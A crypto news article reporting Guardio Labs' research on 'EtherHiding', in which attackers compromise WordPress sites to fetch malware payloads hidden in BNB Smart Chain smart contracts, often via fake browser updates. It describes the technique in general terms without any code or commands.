New EtherHiding Method Bypasses Blockchain Security

New EtherHiding Method Bypasses Blockchain Security Protocols

Written by Aaron S.,

Editor-In-Chief

Last Updated: October 16, 2023

Key Points:

Cybercriminals are using a new "EtherHiding" technique to hide malware in BNB Smart Chain (BSC) smart contracts.
The method involves compromising WordPress websites to retrieve malicious payloads from smart contracts.
Guardio Labs call for adaptive cybersecurity measures.

A recent cybersecurity report reveals a novel technique where cybercriminals exploit BNB Smart Chain smart contracts to camouflage and disseminate malware. Dubbed "EtherHiding," this new method raises concerns about the vulnerability of blockchain-based systems.

Guardio Labs, a cybersecurity research firm, detailed the workings of EtherHiding in an October 15th report. The technique involves compromising WordPress websites, which comprise approximately 43% of all existing websites.

How to Avoid Crypto Taxes? (Legal Ways Explained)

Did you know?

Want to get smarter & wealthier with crypto?

Subscribe - We publish new crypto explainer videos every week!

Cybercriminals inject code into these websites to extract partial payloads from BSC smart contracts, effectively turning these contracts into anonymous hosting platforms for malicious content.

Nati Tal, head of cybersecurity at Guardio Labs, and researcher Oleg Zaytsev pointed out the tough challenge this poses for mitigation.

According to them, the attackers can easily alter the attack methods and code in real-time. One of the most recent adaptations of this strategy involves fake browser updates, where victims are lured to fraudulent landing pages. These fake updates contain JavaScript that fetches supplementary code from the attacker's domains, eventually leading to full site destruction and malware distribution.

The autonomous nature of the compromised smart contracts adds an additional layer of complexity. Once these contracts are live on BSC, Binance has limited options and must rely on its developer community to identify and flag any malicious code.

Guardio Labs emphasizes the need for WordPress website owners to enhance their security measures, as their platforms can serve as initial entry points for these types of threats.

In their conclusion, the researchers from Guardio Labs warned that the capabilities of Web3 and blockchain technology could potentially enable harmful campaigns to operate without detection:

Adaptive defenses are needed to counter these emerging threats.

The discovery of the EtherHiding technique marks a significant evolution in cybercrime tactics using blockchain technology to spread malware. The issue poses a risk for WordPress website owners and presents a broader challenge to blockchain security measures.